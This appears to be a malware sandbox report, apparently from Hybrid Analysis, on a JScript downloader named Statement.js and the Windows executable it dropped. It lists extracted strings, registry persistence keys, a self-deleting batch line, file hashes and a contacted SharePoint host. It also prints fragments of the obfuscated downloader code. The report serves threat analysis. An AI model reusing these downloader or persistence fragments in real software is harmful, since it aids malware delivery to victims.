
Ansi based on Dropped File (download[1].aspx.2515276793)

GetWindowsDirectoryA

Ansi based on Dropped File (download[1].aspx.2515276793)

GlobalSize

Ansi based on Dropped File (download[1].aspx.2515276793)

IMM32.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

ImmInstallIMEA

Ansi based on Dropped File (download[1].aspx.2515276793)

KV8(@

Ansi based on Dropped File (download[1].aspx.2515276793)

lstrcatA

Ansi based on Dropped File (download[1].aspx.2515276793)

MultiByteToWideChar

Ansi based on Dropped File (download[1].aspx.2515276793)

NTDSAPI.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

ole32.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

ReleaseBindInfo

Ansi based on Dropped File (download[1].aspx.2515276793)

SendMessageW

Ansi based on Dropped File (download[1].aspx.2515276793)

SETUPAPI.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

SetupDiDestroyDriverInfoList

Ansi based on Dropped File (download[1].aspx.2515276793)

SetupDiGetActualSectionToInstallA

Ansi based on Dropped File (download[1].aspx.2515276793)

SetupGetLineByIndexA

Ansi based on Dropped File (download[1].aspx.2515276793)

StrCmpNIA

Ansi based on Dropped File (download[1].aspx.2515276793)

urlmon.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

WritePrivateProfileStructA

Ansi based on Dropped File (download[1].aspx.2515276793)

"C:\Statement.js"

Ansi based on Process Commandline (wscript.exe)

%08X-%04X-%04X-%04X-%08X%04X

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

%systemroot%\system32\svchost.exe

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

*.dll

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

76b0d0

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

8576b0d0

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

:%uattrib -h -r -s %%1del %%1if exist %%1 goto %udel %%0

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\\.\pipe\

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\KnownDlls\ntdll.dll

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\Microsoft\Windows\

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

\Modules32

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

\REGISTRY\USER\%s\%s\

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\RPC Control\console-0x00000640-lpc-handle

Unicode based on Runtime Data (goJnUL86e.exe )

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (goJnUL86e.exe )

\Software\Microsoft\Windows\CurrentVersion\Run

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

_allmul

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_aulldiv

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_snprintf

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_snwprintf

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_strupr

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_wcsupr

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

`$D}e

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

ADVAPI32.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

AuthenticodeEnabled

Unicode based on Runtime Data (goJnUL86e.exe )

CloseHandle

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CreateEventA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CreateEventW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CreateFileMappingW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CreateFileW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CreateProcessW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CWDIllegalInDLLSearch

Unicode based on Runtime Data (goJnUL86e.exe )

DebugHeapFlags

Unicode based on Runtime Data (goJnUL86e.exe )

DevicePath

Unicode based on Runtime Data (goJnUL86e.exe )

Disable

Unicode based on Runtime Data (goJnUL86e.exe )

DisableEngine

Unicode based on Runtime Data (goJnUL86e.exe )

DisableImprovedZoneCheck

Unicode based on Runtime Data (goJnUL86e.exe )

DisableLocalOverride

Unicode based on Runtime Data (goJnUL86e.exe )

DisableMetaFiles

Unicode based on Runtime Data (goJnUL86e.exe )

DisableUserModeCallbackFilter

Unicode based on Runtime Data (goJnUL86e.exe )

EnterCriticalSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ExitProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ExpandEnvironmentStringsW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetCurrentProcessId

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetLastError

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetModuleFileNameW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetModuleHandleA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetProcAddress

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetShellWindow

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetTempFileNameW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetTempPathW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetWindowThreadProcessId

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

HeapAlloc

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

HeapCreate

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

HeapDestroy

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

HeapFree

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

hreadProcessId

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

InitializeCriticalSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

KERNEL32.DLL

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

KERNEL32.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

KERNELBASE

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

LdrGetProcedureAddress

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

LdrLoadDll

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

LeaveCriticalSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

llWindow

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

LoadAppInit_DLLs

Unicode based on Runtime Data (goJnUL86e.exe )

LoadLibraryA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

LoadLibraryW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Local\

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

Local\ShellReadyEvent

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

lstrcatW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcmpA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcmpiA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcmpW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcpynA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrcpyW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrlenA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

lstrlenW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

MachinePreferredUILanguages

Unicode based on Runtime Data (goJnUL86e.exe )

MapViewOfFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

mbstowcs

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

memcpy

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

memset

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Modules32

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

Modules64

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

mroot%\system32\svchost.exe

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

NtClose

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

NtCreateKey

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtCreateSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ntdll.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NTDLL.DLL

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

NtMapViewOfSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtOpenProcessToken

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtOpenSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryInformationProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryInformationToken

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryValueKey

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtQueryVirtualMemory

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtResumeProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtSuspendProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

NtUnmapViewOfSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

OpenEventA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

OpenProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

p^6Qyp

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

PageAllocatorSystemHeapIsPrivate

Unicode based on Runtime Data (goJnUL86e.exe )

PageAllocatorUseSystemHeap

Unicode based on Runtime Data (goJnUL86e.exe )

PathFindExtensionW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

PathFindFileNameW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

pipe\

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

PreferExternalManifest

Unicode based on Runtime Data (goJnUL86e.exe )

PreferredUILanguages

Unicode based on Runtime Data (goJnUL86e.exe )

ReadFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Redirection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

RegCloseKey

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegCreateKeyW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegEnumValueW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegOpenKeyW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RegSetValueExW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ResetEvent

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ResumeThread

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RtlImageNtHeader

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RtlInitUnicodeString

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RtlNtStatusToDosError

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

RtlUnwind

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

S-%u-%u

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

SafeDllSearchMode

Unicode based on Runtime Data (goJnUL86e.exe )

Security_HKLM_only

Unicode based on Runtime Data (goJnUL86e.exe )

SetEndOfFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SetEvent

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SetFilePointer

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SetLastError

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SHELL32.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ShellExecuteW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SHLWAPI.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Sleep

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Software\AppDataLow\Software\Microsoft

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

SourcePath

Unicode based on Runtime Data (goJnUL86e.exe )

StrStrIW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

SYSTEM

Unicode based on Runtime Data (goJnUL86e.exe )

temroot%\system32\c_1252.NLS

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

TransparentEnabled

Unicode based on Runtime Data (goJnUL86e.exe )

TSAppCompat

Unicode based on Runtime Data (goJnUL86e.exe )

TSUserEnabled

Unicode based on Runtime Data (goJnUL86e.exe )

UnmapViewOfFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

USER32

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

USER32.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

VirtualAlloc

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

VirtualFree

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

VirtualProtect

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

WaitForSingleObject

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

wcstombs

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

Wow64EnableWow64FsRedirection

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

WriteFile

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

wsprintfW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

X-%08X%04X

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

ZwProtectVirtualMemory

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

ZwQueryInformationProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

{%08X-%04X-%04X-%04X-%08X%04X}

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

%windir%\tracing

Unicode based on Runtime Data (wscript.exe )

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (wscript.exe )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (wscript.exe )

AutoConfigURL

Unicode based on Runtime Data (wscript.exe )

AutoDetect

Unicode based on Runtime Data (wscript.exe )

ConsoleTracingMask

Unicode based on Runtime Data (wscript.exe )

CryptSvc

Unicode based on Runtime Data (wscript.exe )

cryptsvc

Unicode based on Runtime Data (wscript.exe )

DefaultConnectionSettings

Unicode based on Runtime Data (wscript.exe )

en-US

Unicode based on Runtime Data (wscript.exe )

EnableConsoleTracing

Unicode based on Runtime Data (wscript.exe )

EnableFileTracing

Unicode based on Runtime Data (wscript.exe )

FileDirectory

Unicode based on Runtime Data (wscript.exe )

FileTracingMask

Unicode based on Runtime Data (wscript.exe )

gpsvc

Unicode based on Runtime Data (wscript.exe )

IETldDllVersionHigh

Unicode based on Runtime Data (wscript.exe )

IETldDllVersionLow

Unicode based on Runtime Data (wscript.exe )

IETldVersionHigh

Unicode based on Runtime Data (wscript.exe )

IETldVersionLow

Unicode based on Runtime Data (wscript.exe )

IntranetName

Unicode based on Runtime Data (wscript.exe )

LanguageList

Unicode based on Runtime Data (wscript.exe )

LastScavenge

Unicode based on Runtime Data (wscript.exe )

LastScavenge_TIMESTAMP

Unicode based on Runtime Data (wscript.exe )

MaxFileSize

Unicode based on Runtime Data (wscript.exe )

Network

Unicode based on Runtime Data (wscript.exe )

ProxyBypass

Unicode based on Runtime Data (wscript.exe )

ProxyEnable

Unicode based on Runtime Data (wscript.exe )

ProxyOverride

Unicode based on Runtime Data (wscript.exe )

ProxyServer

Unicode based on Runtime Data (wscript.exe )

rasman

Ansi based on Runtime Data (wscript.exe )

RASMAN

Ansi based on Runtime Data (wscript.exe )

SavedLegacySettings

Unicode based on Runtime Data (wscript.exe )

ServicesActive

Unicode based on Runtime Data (wscript.exe )

StaleIETldCache

Unicode based on Runtime Data (wscript.exe )

TLDUpdates

Unicode based on Runtime Data (wscript.exe )

UNCAsIntranet

Unicode based on Runtime Data (wscript.exe )

WinHttpAutoProxySvc

Unicode based on Runtime Data (wscript.exe )

WpadDecision

Unicode based on Runtime Data (wscript.exe )

WpadDecisionReason

Unicode based on Runtime Data (wscript.exe )

WpadDecisionTime

Unicode based on Runtime Data (wscript.exe )

WpadLastNetwork

Unicode based on Runtime Data (wscript.exe )

WpadNetworkName

Unicode based on Runtime Data (wscript.exe )

{09477111-DE61-43CD-A5AA-D9F7B489301F}

Unicode based on Runtime Data (wscript.exe )

++iagCPv;if (iagCPv==CXspSP02.length) iagCPv=(((0x103000>>0xc)*(8073834705028118528/8073834705028118528)+(1333788672>>>23))%(~-2));WjsincMu04mn['73656E64'.tr()]();

Ansi based on Hybrid Analysis (Statement.js.bin)

bTdeP18rrN=-1+bTdeP18rrN}

Ansi based on Hybrid Analysis (Statement.js.bin)

catch(FDCBEIK){}

Ansi based on Hybrid Analysis (Statement.js.bin)

eoECJZjuESk=WjsincMu04mn['73746174iihgqfa75nnm7354maxM6578eihbvqq sIwYeYob74'.tr()];if (eoECJZjuESk&&eoECJZjuESk=='4F4B'.tr()) cTcPk16=((~(~0x4000))>>(14<<32));}

Ansi based on Hybrid Analysis (Statement.js.bin)

function String.prototype.tr(){

Ansi based on Hybrid Analysis (Statement.js.bin)

QxgoLa8eWQJs=this['4163746976oxwjUb65584FPwwmJ62acIeHet6A65Gas6374'.tr()];

Ansi based on Hybrid Analysis (Statement.js.bin)

TPGmyuZNW=""+new Date();while(bTdeP18rrN>(((0x8800000>>>5)>>(0xd*0x1+0x1))%(0x261144599b8cde00/2743048799697821184))){cN0iJCu=TPGmyuZNW.split(ISFyFJdm3db);V7EsmVm.push(cN0iJCu[bTdeP18rrN%(3+3)]);

Ansi based on Hybrid Analysis (Statement.js.bin)

V7EsmVm=[];YEbZZQzlF=(((0x1575d650840a7900*0x5+0x75c997edf4cc800)/(0x195325e1802d2c00*4+0xd5d318b72cc7400))*(6227290810542648320/0x2b35e3ffd1b97600));

Ansi based on Hybrid Analysis (Statement.js.bin)

var bTdeP18rrN=(~((-479*1-87)*(~-2)-(0xd980000>>>19)));

Ansi based on Hybrid Analysis (Statement.js.bin)

Ansi based on Memory/File Scan (Statement.js.bin)

var cTcPk16=0;

Ansi based on Hybrid Analysis (Statement.js.bin)

var iagCPv=14-7*YEbZZQzlF;

Ansi based on Hybrid Analysis (Statement.js.bin)

var ISFyFJdm3db=' ';bTdeP18rrN=bTdeP18rrN*(~(~(0x6e00>>0x7)))*YEbZZQzlF;

Ansi based on Hybrid Analysis (Statement.js.bin)

wewg2GZ=new QxgoLa8eWQJs('41444F44422Eeqzj537472pUg65616D'.tr());wewg2GZ['6F70qakikeekaxvJ65ixyzh6E'.tr()]();wewg2GZ['74797065'.tr()]=YEbZZQzlF-(~((-56532*1-0x232c)>>(0xf<<32)));

Ansi based on Hybrid Analysis (Statement.js.bin)

wewg2GZ['636C6FmRQfwdxrd 73Y w65'.tr()]();Iw7NDHE3h6L[xxNIVi](kjiamnwS01pn,(((4*0xd+0x1)*(512>>>0x9)+(32768>>0xa))%(1<<0x20)),y_tgb0wb7-YEbZZQzlF);

Ansi based on Hybrid Analysis (Statement.js.bin)

while(WjsincMu04mn['72656164qpwzneLencr79dluHgqpl Jhzcz73746174mcvus65'.tr()]<(YEbZZQzlF+y_tgb0wb7)){ Iw7NDHE3h6L['536C656570'.tr()]((((0x3*66+0x2)>>(0x1<<1))<<(16384>>0xe)));}

Ansi based on Hybrid Analysis (Statement.js.bin)

X50wIu='457870616EasRy pGbyj6445bfodmpt6E7669utx726F6ERownbamKs6D65X Hdv6EsqGbmIc745374zRt Isuybr7269tcmJz6Ephurd6773'.tr();

Ansi based on Hybrid Analysis (Statement.js.bin)

y_tgb0wb7=(~((~0x0)*(0x3<<32)));

Ansi based on Hybrid Analysis (Statement.js.bin)

?______J

Ansi based on Image Processing (screen_0.png)

_-,?'

Ansi based on Image Processing (screen_0.png)

____,,

Ansi based on Image Processing (screen_0.png)

_m_m,,,

Ansi based on Image Processing (screen_0.png)

_pAyLoAD

Ansi based on Image Processing (screen_0.png)

_r?m?_?_?_J?_?___q_?__,m__??_mun??__?_v____,_,_

Ansi based on Image Processing (screen_0.png)

SECU_

Ansi based on Image Processing (screen_0.png)

talkuktelecom-my.sharepoint.com

Ansi based on PCAP Processing (PCAP)

Extracted Files

Displaying 7 extracted file(s). The remaining 3 file(s) are available in the full version and XML/JSON reports.

Malicious 2

download[1].aspx

Download Disabled VirusTotal Report Hash Seen Before

Size
245KiB (251320 bytes)

Type
peexe executable

Description
PE32 executable (console) Intel 80386, for MS Windows

AV Scan Result
Labeled as "Trojan.WisdomEyes.16070401.9500" (5/64)

Runtime Process
wscript.exe (PID: 2576)

MD5

2959e289d01d289414f6c2e3e5445847

SHA1

58a6d2e4f7f67209489d24fbe4185b69ba610942

SHA256

75dbfe702c9ade3f145d13983b5e77c9734ba1eefaca12add76f7bcdf16b5b62
goJnUL86e.exe

Download Disabled Extended File Details VirusTotal Report Hash Seen Before

Size
245KiB (251320 bytes)

Type
peexe executable

Description
PE32 executable (console) Intel 80386, for MS Windows

AV Scan Result
Labeled as "Trojan.WisdomEyes.16070401.9500" (5/64)

Runtime Process
wscript.exe (PID: 2576)

MD5

2959e289d01d289414f6c2e3e5445847

SHA1

58a6d2e4f7f67209489d24fbe4185b69ba610942

SHA256

75dbfe702c9ade3f145d13983b5e77c9734ba1eefaca12add76f7bcdf16b5b62

Extended File Details

goJnUL86e.exe

Filename: goJnUL86e.exe
Size: 245KiB (251320 bytes)
Type: peexe executable
Description: PE32 executable (console) Intel 80386, for MS Windows
Architecture
: 32 Bit
MD5
: 2959e289d01d289414f6c2e3e5445847
SHA1
: 58a6d2e4f7f67209489d24fbe4185b69ba610942
SHA256
: 75dbfe702c9ade3f145d13983b5e77c9734ba1eefaca12add76f7bcdf16b5b62
SHA512
: fc0ac5ac262b96ec226567bbc260683ec555d59d40b2c1b1ea9597565d426f34702612df21eb4e91b456a920f56f0b6b2d7725a199cbad0f1bd27107dc8f542a
ssdeep
: 3072:amsUKG332gNYnzFsJtw5TIFsE/3nB4lByuhuK:amsUDHJuRsjeMRQy
imphash
: 81e41ac23d9f462cce579822ca97e81a
authentihash
: fafc943e0811611a52347e07f273f4e9f0a55b7a2ae54d8203ed772778234f91
Compiler/Packer
: Microsoft visual C++ 8.0

File Sections

Details	Name	Entropy	Virtual Address	Virtual Size	Raw Size	MD5
Name .bss Entropy 1.60225692548 Virtual Address 0x1000 Virtual Size 0x19410 Raw Size 0x1a000 MD5 de77264552aa2d80c0527922f7daba37	.bss	1.60225692548	0x1000	0x19410	0x1a000	de77264552aa2d80c0527922f7daba37
Name .adata Entropy 2.64447178701 Virtual Address 0x1b000 Virtual Size 0x17db Raw Size 0x2000 MD5 4d4f3604ecd2ef3d17683787997e2d1b	.adata	2.64447178701	0x1b000	0x17db	0x2000	4d4f3604ecd2ef3d17683787997e2d1b
